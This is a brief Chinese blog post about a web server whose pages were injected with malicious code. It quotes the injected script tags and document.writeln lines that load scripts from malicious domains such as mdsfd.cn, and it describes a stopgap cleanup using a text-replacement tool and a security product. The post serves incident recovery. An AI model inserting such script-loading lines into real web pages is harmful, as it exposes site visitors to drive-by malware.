服务器1月份就中马了，项目太紧，人太懒，又无关紧要，就一直没搭理它。小昭的BLOG纠结中，龚浩的BLOG纠结中……唉，没办法，小昭可乐都给我买了，不得不出山了。服务器上网站太多，不知是哪有漏洞，索性弄了一招治标不治本的，暂时顶着先。

症状：

网页被挂马，多了一句<script src=http://mdsfd.cn></script>，挂的恶意网站有如下等等：www.51jcjy.com www.rr88rr.cn，所有的JS文件均被添加了

document.writeln ("<script src=\"http://mdsfd.cn\"><\/script>");
document.writeln ("<script src=\"http://vawh5.cn\"><\/script>");
document.writeln ("<script src=\"http://lnadk.cn\"><\/script>");

个别ASP文件被添加上了

<script src=http://mdsfd.cn></script>

删除之后过一段时间文件又被修改。排除ARP病毒，IIS配置文件被改的可能性，具体步骤不做讲解。查找木马的根源，无奈服务器上网站太多，没法子下手。遂先解决当前问题……

现在采用了以下方案：

1. 首先下载 文本替换专家 2.6，将恶意代码全部清除。
2. 登录www.websafeguard.cn 下载 网站安全卫士-服务器版
3. 配置一下就OK了。详细的设置查帮助文档。

后话

还有一哥们提供了方案，买他们的mdcsoft-ips软件，貌似可以从根源上防止问题。只不过这网站的名字 Mdcsoft（中国）研究院，Mdcsoft（中国）研发集团，够山寨